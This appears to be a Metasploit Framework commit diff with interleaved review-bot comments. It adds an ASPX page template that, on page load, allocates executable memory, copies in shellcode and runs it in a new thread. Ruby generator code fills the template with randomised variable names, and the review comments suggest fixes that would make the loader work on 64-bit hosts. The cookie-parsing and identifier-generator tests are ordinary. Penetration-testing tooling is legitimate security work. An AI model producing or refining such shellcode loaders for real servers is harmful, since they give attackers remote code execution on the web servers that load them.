Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master
commit
9fde8bee2b
|
@ -0,0 +1,21 @@
|
|||
<%%@ Page Language="C#" AutoEventWireup="true" %%>
|
||||
<%%@ Import Namespace="System.IO" %%>
|
||||
<script runat="server">
|
||||
private static Int32 MEM_COMMIT=0x1000;
|
||||
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
|
||||
|
||||
[System.Runtime.InteropServices.DllImport("kernel32")]
|
||||
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
|
||||
|
||||
[System.Runtime.InteropServices.DllImport("kernel32")]
|
||||
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
|
||||
|
||||
protected void Page_Load(object sender, EventArgs e)
|
||||
{
|
||||
%{shellcode}
|
||||
IntPtr %{var_funcAddr} = VirtualAlloc(IntPtr.Zero,(UIntPtr)%{var_bytearray}.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
System.Runtime.InteropServices.Marshal.Copy(%{var_bytearray},0,%{var_funcAddr},%{var_bytearray}.Length);
|
||||
IntPtr %{var_threadId} = IntPtr.Zero;
|
||||
IntPtr %{var_hThread} = CreateThread(IntPtr.Zero,UIntPtr.Zero,%{var_funcAddr},IntPtr.Zero,0,ref %{var_threadId});
|
||||
}
|
||||
</script>
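Review bot: The two P/Invoke declarations do not match the kernel32 prototypes they bind: `flProtect` in `VirtualAlloc` and `lpThreadId` in `CreateThread` are 32-bit `DWORD` values, yet both are declared as `IntPtr`, which is pointer-sized in a 64-bit worker process. Declaring `private const UInt32 PAGE_EXECUTE_READWRITE = 0x40;` with a `UInt32 flProtect` parameter, and `out UInt32 lpThreadId`, would make the signatures correct for both architectures the spec exercises. In `Page_Load` the `VirtualAlloc` result goes straight into `Marshal.Copy` without a comparison against `IntPtr.Zero`, and the handle kept in `%{var_hThread}` is never read or closed.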
|
|
@ -13,6 +13,7 @@ class EXE
|
|||
require 'rex'
|
||||
require 'rex/peparsey'
|
||||
require 'rex/pescan'
|
||||
require 'rex/random_identifier_generator'
|
||||
require 'rex/zip'
|
||||
require 'metasm'
|
||||
require 'digest/sha1'
|
||||
|
@ -56,8 +57,8 @@ require 'msf/core/exe/segment_injector'
|
|||
end
|
||||
end
|
||||
|
||||
def self.read_replace_script_template(filename, hash_sub)
|
||||
template_pathname = File.join(Msf::Config.install_root, "data", "templates", "scripts", filename)
|
||||
def self.read_replace_script_template(filename, hash_sub)
|
||||
template_pathname = File.join(Msf::Config.data_directory, "templates", "scripts", filename)
|
||||
|
||||
template = ''
|
||||
File.open(template_pathname, "rb") do |f|
|
||||
|
@ -822,17 +823,32 @@ def self.to_vba(framework,code,opts={})
|
|||
return read_replace_script_template("to_exe.aspx.template", hash_sub)
|
||||
end
|
||||
|
||||
def self.to_win32pe_psh_net(framework, code, opts={})
|
||||
hash_sub = {}
|
||||
hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_kernel32] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_baseaddr] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_threadHandle] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_output] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_temp] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_codeProvider] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_compileParams] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
def self.to_mem_aspx(framework, code, exeopts={})
|
||||
# Intialize rig and value names
|
||||
rig = Rex::RandomIdentifierGenerator.new()
|
||||
rig.init_var(:var_funcAddr)
|
||||
rig.init_var(:var_hThread)
|
||||
rig.init_var(:var_pInfo)
|
||||
rig.init_var(:var_threadId)
|
||||
rig.init_var(:var_bytearray)
|
||||
|
||||
hash_sub = rig.to_h
|
||||
hash_sub[:shellcode] = Rex::Text.to_csharp(code, 100, rig[:var_bytearray])
|
||||
|
||||
return read_replace_script_template("to_mem.aspx.template", hash_sub)
|
||||
end
|
||||
|
||||
def self.to_win32pe_psh_net(framework, code, opts={})
|
||||
hash_sub = {}
|
||||
hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_kernel32] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_baseaddr] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_threadHandle] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_output] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_temp] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_codeProvider] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_compileParams] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
|
||||
hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code])
|
||||
|
||||
|
@ -1532,21 +1548,24 @@ def self.to_vba(framework,code,opts={})
|
|||
output = Msf::Util::EXE.to_exe_asp(exe, exeopts)
|
||||
|
||||
when 'aspx'
|
||||
exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
|
||||
output = Msf::Util::EXE.to_exe_aspx(exe, exeopts)
|
||||
output = Msf::Util::EXE.to_mem_aspx(framework, code, exeopts)
|
||||
|
||||
when 'dll'
|
||||
output = case arch
|
||||
when ARCH_X86,nil then to_win32pe_dll(framework, code, exeopts)
|
||||
when ARCH_X86_64 then to_win64pe_dll(framework, code, exeopts)
|
||||
when ARCH_X64 then to_win64pe_dll(framework, code, exeopts)
|
||||
end
|
||||
when 'exe'
|
||||
output = case arch
|
||||
when ARCH_X86,nil then to_win32pe(framework, code, exeopts)
|
||||
when ARCH_X86_64 then to_win64pe(framework, code, exeopts)
|
||||
when ARCH_X64 then to_win64pe(framework, code, exeopts)
|
||||
end
|
||||
when 'aspx-exe'
|
||||
exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
|
||||
output = Msf::Util::EXE.to_exe_aspx(exe, exeopts)
|
||||
|
||||
when 'dll'
|
||||
output = case arch
|
||||
when ARCH_X86,nil then to_win32pe_dll(framework, code, exeopts)
|
||||
when ARCH_X86_64 then to_win64pe_dll(framework, code, exeopts)
|
||||
when ARCH_X64 then to_win64pe_dll(framework, code, exeopts)
|
||||
end
|
||||
when 'exe'
|
||||
output = case arch
|
||||
when ARCH_X86,nil then to_win32pe(framework, code, exeopts)
|
||||
when ARCH_X86_64 then to_win64pe(framework, code, exeopts)
|
||||
when ARCH_X64 then to_win64pe(framework, code, exeopts)
|
||||
end
|
||||
|
||||
when 'exe-service'
|
||||
output = case arch
|
||||
|
@ -1629,12 +1648,12 @@ def self.to_vba(framework,code,opts={})
|
|||
output
|
||||
end
|
||||
|
||||
def self.to_executable_fmt_formats
|
||||
[
|
||||
'dll','exe','exe-service','exe-small','exe-only','elf','macho','vba','vba-exe',
|
||||
'vbs','loop-vbs','asp','aspx','war','psh','psh-net'
|
||||
]
|
||||
end
|
||||
def self.to_executable_fmt_formats
|
||||
[
|
||||
'dll','exe','exe-service','exe-small','exe-only','elf','macho','vba','vba-exe',
|
||||
'vbs','loop-vbs','asp','aspx', 'aspx-exe','war','psh','psh-net'
|
||||
]
|
||||
end
|
||||
|
||||
#
|
||||
# EICAR Canary: https://www.metasploit.com/redmine/projects/framework/wiki/EICAR
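Review bot: `to_mem_aspx` reserves `:var_pInfo`, but the to_mem.aspx.template added in this commit has no `%{var_pInfo}` placeholder, so the `rig.init_var(:var_pInfo)` line is dead and can be dropped; the `framework` argument is also unused in the visible body. The `when 'aspx'` branch now returns the in-memory page while the EXE-based output moves to `'aspx-exe'`, which silently changes what existing callers of the `'aspx'` format receive. A comment on that branch such as `# 'aspx' now runs the payload in-process; 'aspx-exe' keeps the previous EXE-based output` would make the switch visible to anyone reading the format list. The comment `# Intialize rig and value names` should read `Initialize`.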
|
||||
|
|
|
@ -66,15 +66,22 @@ class Rex::RandomIdentifierGenerator
|
|||
#}
|
||||
end
|
||||
|
||||
# Return a unique random identifier for +name+, generating a new one
|
||||
# if necessary.
|
||||
#
|
||||
# @param name [Symbol] A descriptive, intention-revealing name for an
|
||||
# identifier. This is what you would normally call the variable if
|
||||
# you weren't generating it.
|
||||
# @return [String]
|
||||
def get(name)
|
||||
return @value_by_name[name] if @value_by_name[name]
|
||||
# Returns the @value_by_name hash
|
||||
#
|
||||
# @return [Hash]
|
||||
def to_h
|
||||
return @value_by_name
|
||||
end
|
||||
|
||||
# Return a unique random identifier for +name+, generating a new one
|
||||
# if necessary.
|
||||
#
|
||||
# @param name [Symbol] A descriptive, intention-revealing name for an
|
||||
# identifier. This is what you would normally call the variable if
|
||||
# you weren't generating it.
|
||||
# @return [String]
|
||||
def get(name)
|
||||
return @value_by_name[name] if @value_by_name[name]
|
||||
|
||||
@value_by_name[name] = generate
|
||||
@name_by_value[@value_by_name[name]] = name
|
||||
|
@ -82,6 +89,7 @@ class Rex::RandomIdentifierGenerator
|
|||
@value_by_name[name]
|
||||
end
|
||||
alias [] get
|
||||
alias init_var get
|
||||
|
||||
# Add a new identifier. Its name will be checked for uniqueness among
|
||||
# previously-generated names.
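Review bot: `to_h` returns `@value_by_name` itself rather than a copy, so any caller that writes to the result also writes into the generator's internal state. `to_mem_aspx` in exe.rb does exactly that with `hash_sub[:shellcode] = ...`, which leaves a `:shellcode` entry in `@value_by_name` with no matching entry in `@name_by_value`. Returning `@value_by_name.dup` keeps the two maps consistent, and the doc comment can then say that the hash is a snapshot of the names generated so far.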
|
||||
|
|
|
@ -1,112 +1,191 @@
|
|||
require 'rex/proto/http/response'
|
||||
|
||||
get_cookies_test_1 = '
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 26 Apr 2013 12:43:12 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.6-1ubuntu1.2
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: private, max-age=10800, pre-check=10800
|
||||
Last-Modified: Fri, 26 Apr 2013 12:01:52 GMT
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 63951
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html
|
||||
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">'
|
||||
|
||||
get_cookies_test_2 = '
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 26 Apr 2013 08:44:54 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.6-1ubuntu1.2
|
||||
Set-Cookie: phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue; path=/phpmyadmin/; HttpOnly
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: private, max-age=10800, pre-check=10800
|
||||
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
|
||||
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954; path=/phpmyadmin/; HttpOnly
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 7356
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=utf-8
|
||||
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
|
||||
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'
|
||||
|
||||
get_cookies_test_3 = '
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 26 Apr 2013 08:44:54 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.6-1ubuntu1.2
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: private, max-age=10800, pre-check=10800
|
||||
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
|
||||
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954; path=/phpmyadmin/; HttpOnly
|
||||
Set-Cookie: superC00kie!=stupidcookie; Path=/parp/; domain=.foo.com; HttpOnly; Expires=Wed, 13-Jan-2012 22:23:01 GMT; Secure
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 7356
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=utf-8
|
||||
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
|
||||
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'
|
||||
|
||||
get_cookies_test_4 ='
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 26 Apr 2013 08:44:54 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.6-1ubuntu1.2
|
||||
Set-Cookie: phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue; path=/phpmyadmin/; HttpOnly
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: private, max-age=10800, pre-check=10800
|
||||
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
|
||||
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: phpMyAdmin=; path=/phpmyadmin/; HttpOnly
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 7356
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=utf-8
|
||||
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
|
||||
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'
|
||||
|
||||
describe Rex::Proto::Http::Response do
|
||||
R = Rex::Proto::Http::Response
|
||||
it "get_cookies returns empty string for no Set-Cookies" do
|
||||
resp = R.new()
|
||||
resp.parse(get_cookies_test_1)
|
||||
resp.get_cookies.should eq("")
|
||||
end
|
||||
|
||||
it "get_cookies returns 5 cookies for test 2" do
|
||||
resp = R.new()
|
||||
resp.parse(get_cookies_test_2)
|
||||
resp.get_cookies.split(';').count.should eq(5)
|
||||
end
|
||||
def get_cookies_test_no_cookies
|
||||
<<-HEREDOC.gsub(/^ {6}/, '')
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 26 Apr 2013 12:43:12 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.6-1ubuntu1.2
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: private, max-age=10800, pre-check=10800
|
||||
Last-Modified: Fri, 26 Apr 2013 12:01:52 GMT
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 63951
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html
|
||||
|
||||
it "get_cookies returns 5 cookies for test 3 and parses full cookie" do
|
||||
resp = R.new()
|
||||
resp.parse(get_cookies_test_3)
|
||||
resp.get_cookies.split(';').count.should eq(5)
|
||||
resp.get_cookies.include?("superC00kie!=stupidcookie;").should be_true
|
||||
end
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">'
|
||||
HEREDOC
|
||||
end
|
||||
|
||||
def get_cookies_test_five_cookies
|
||||
<<-HEREDOC.gsub(/^ {6}/, '')
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 26 Apr 2013 08:44:54 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.6-1ubuntu1.2
|
||||
Set-Cookie: phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue; path=/phpmyadmin/; HttpOnly
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: private, max-age=10800, pre-check=10800
|
||||
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
|
||||
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954; path=/phpmyadmin/; HttpOnly
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 7356
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=utf-8
|
||||
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
|
||||
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|
||||
HEREDOC
|
||||
end
|
||||
|
||||
def get_cookies_test_five_ordered_cookies
|
||||
<<-HEREDOC.gsub(/^ {6}/, '')
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 26 Apr 2013 08:44:54 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.6-1ubuntu1.2
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: private, max-age=10800, pre-check=10800
|
||||
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
|
||||
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954; path=/phpmyadmin/; HttpOnly
|
||||
Set-Cookie: superC00kie!=stupidcookie; Path=/parp/; domain=.foo.com; HttpOnly; Expires=Wed, 13-Jan-2012 22:23:01 GMT; Secure
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 7356
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=utf-8
|
||||
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
|
||||
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|
||||
HEREDOC
|
||||
end
|
||||
|
||||
def get_cookies_test_with_empty_cookie
|
||||
<<-HEREDOC.gsub(/^ {6}/, '')
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 26 Apr 2013 08:44:54 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.6-1ubuntu1.2
|
||||
Set-Cookie: phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue; path=/phpmyadmin/; HttpOnly
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: private, max-age=10800, pre-check=10800
|
||||
Last-Modified: Sun, 12 Aug 2012 13:38:18 GMT
|
||||
Set-Cookie: pma_lang=en; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_collation_connection=utf8_general_ci; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: pma_mcrypt_iv=mF1NmTE64IY%3D; expires=Sun, 26-May-2013 08:44:54 GMT; path=/phpmyadmin/; httponly
|
||||
Set-Cookie: phpMyAdmin=; path=/phpmyadmin/; HttpOnly
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 7356
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=utf-8
|
||||
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
|
||||
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|
||||
HEREDOC
|
||||
end
|
||||
|
||||
def get_cookies_test_one_set_cookie_header
|
||||
<<-HEREDOC.gsub(/^ {6}/, '')
|
||||
HTTP/1.1 200 OK
|
||||
Date: Wed, 25 Sep 2013 20:29:23 GMT
|
||||
Server: Apache/2.2.22 (Ubuntu)
|
||||
X-Powered-By: PHP/5.4.9-4ubuntu2.2
|
||||
Expires: Wed, 11 Jan 1984 05:00:00 GMT
|
||||
Last-Modified: Wed, 25 Sep 2013 20:29:23 GMT
|
||||
Cache-Control: no-cache, must-revalidate, max-age=0
|
||||
Pragma: no-cache
|
||||
Set-Cookie: wordpressuser_a97c5267613d6de70e821ff82dd1ab94=admin; path=/wordpress-2.0/, wordpresspass_a97c5267613d6de70e821ff82dd1ab94=c3284d0f94606de1fd2af172aba15bf3; path=/wordpress-2.0/
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 0
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
|
||||
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|
||||
HEREDOC
|
||||
end
|
||||
|
||||
def cookie_sanity_check(meth)
|
||||
resp = described_class.new()
|
||||
resp.parse(self.send meth)
|
||||
cookies = resp.get_cookies
|
||||
cookies.should_not be_nil
|
||||
cookies.should_not be ''
|
||||
cookies.split(';').map(&:strip)
|
||||
end
|
||||
|
||||
context "#get_cookies" do
|
||||
|
||||
it 'returns empty string for no Set-Cookies' do
|
||||
resp = described_class.new()
|
||||
resp.parse(get_cookies_test_no_cookies)
|
||||
resp.get_cookies.should eq('')
|
||||
end
|
||||
|
||||
it 'returns 5 cookies when given 5 cookies non-sequentially' do
|
||||
cookies_array = cookie_sanity_check(:get_cookies_test_five_cookies)
|
||||
cookies_array.count.should eq(5)
|
||||
cookies_array.should =~ %w(
|
||||
pma_lang=en
|
||||
pma_collation_connection=utf8_general_ci
|
||||
pma_mcrypt_iv=mF1NmTE64IY%3D
|
||||
phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954
|
||||
phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue
|
||||
)
|
||||
end
|
||||
|
||||
it 'returns and parses 5 cookies when given 5 ordered cookies' do
|
||||
cookies_array = cookie_sanity_check(:get_cookies_test_five_ordered_cookies)
|
||||
cookies_array.count.should eq(5)
|
||||
expected_cookies = %w{
|
||||
pma_lang=en
|
||||
pma_collation_connection=utf8_general_ci
|
||||
pma_mcrypt_iv=mF1NmTE64IY%3D
|
||||
phpMyAdmin=fmilioji5cn4m8bo5vjrrr6q9cada954
|
||||
superC00kie!=stupidcookie
|
||||
}
|
||||
expected_cookies.shuffle!
|
||||
cookies_array.should include(*expected_cookies)
|
||||
end
|
||||
|
||||
it 'parses an empty cookie value' do
|
||||
cookies_array = cookie_sanity_check(:get_cookies_test_with_empty_cookie)
|
||||
cookies_array.count.should eq(5)
|
||||
expected_cookies = %w{
|
||||
pma_lang=en
|
||||
pma_collation_connection=utf8_general_ci
|
||||
pma_mcrypt_iv=mF1NmTE64IY%3D
|
||||
phpMyAdmin=
|
||||
phpMyAdmin=gpjif0gtpqbvfion91ddtrq8p8vgjtue
|
||||
}
|
||||
expected_cookies.shuffle!
|
||||
cookies_array.should include(*expected_cookies)
|
||||
|
||||
end
|
||||
|
||||
it 'parses multiple cookies in one Set-Cookie header' do
|
||||
cookies_array = cookie_sanity_check(:get_cookies_test_one_set_cookie_header)
|
||||
cookies_array.count.should eq(2)
|
||||
expected_cookies = %w{
|
||||
wordpressuser_a97c5267613d6de70e821ff82dd1ab94=admin
|
||||
wordpresspass_a97c5267613d6de70e821ff82dd1ab94=c3284d0f94606de1fd2af172aba15bf3
|
||||
}
|
||||
expected_cookies.shuffle!
|
||||
cookies_array.should include(*expected_cookies)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
it "get_cookies returns 5 cookies for test 4 and parses empty value" do
|
||||
resp = R.new()
|
||||
resp.parse(get_cookies_test_4)
|
||||
resp.get_cookies.split(';').count.should eq(5)
|
||||
resp.get_cookies.include?("phpMyAdmin=;").should be_true
|
||||
end
|
||||
end
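Review bot: In `cookie_sanity_check`, `cookies.should_not be ''` compares object identity (`equal?`), and a fresh `''` literal is never the same object as the string returned by `get_cookies`, so the assertion cannot fail. `cookies.should_not eq('')` checks what the helper intends. `resp.parse(self.send meth)` reads more clearly as `resp.parse(send(meth))`. The `get_cookies_test_no_cookies` heredoc also appears to keep a trailing `'` after its DOCTYPE line, left over from the old single-quoted fixture.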
|
||||
|
||||
|
|
|
@ -11,6 +11,8 @@ describe Rex::RandomIdentifierGenerator do
|
|||
it { should respond_to(:generate) }
|
||||
it { should respond_to(:[]) }
|
||||
it { should respond_to(:get) }
|
||||
it { should respond_to(:store) }
|
||||
it { should respond_to(:to_h) }
|
||||
|
||||
describe "#generate" do
|
||||
it "should respect :min_length" do
|
||||
|
@ -120,4 +122,20 @@ describe Rex::RandomIdentifierGenerator do
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
describe "#to_h" do
|
||||
it "should return a Hash" do
|
||||
rig.to_h.should be_kind_of(Hash)
|
||||
end
|
||||
it "should return expected key-value pairs" do
|
||||
expected_keys = [:var_foo, :var_bar]
|
||||
expected_keys.shuffle.each do |key|
|
||||
rig.init_var(key)
|
||||
end
|
||||
rig.to_h.size.should eq(expected_keys.size)
|
||||
rig.to_h.keys.should include(*expected_keys)
|
||||
rig.to_h.values.map {|v| v.class}.uniq.should eq([String])
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -24,6 +24,8 @@ shared_context 'Msf::Util::Exe' do
|
|||
{ :format => "loop-vbs", :arch => "x86_64", :file_fp => /ASCII/ },
|
||||
{ :format => "asp", :arch => "x86", :file_fp => /ASCII/ },
|
||||
{ :format => "asp", :arch => "x86_64", :file_fp => /ASCII/ },
|
||||
{ :format => "aspx-exe", :arch => "x86", :file_fp => /ASCII/ },
|
||||
{ :format => "aspx-exe", :arch => "x86_64", :file_fp => /ASCII/ },
|
||||
{ :format => "aspx", :arch => "x86", :file_fp => /ASCII/ },
|
||||
{ :format => "aspx", :arch => "x86_64", :file_fp => /ASCII/ },
|
||||
{ :format => "vba", :arch => "x86", :file_fp => /ASCII/ },
|
||||
|
|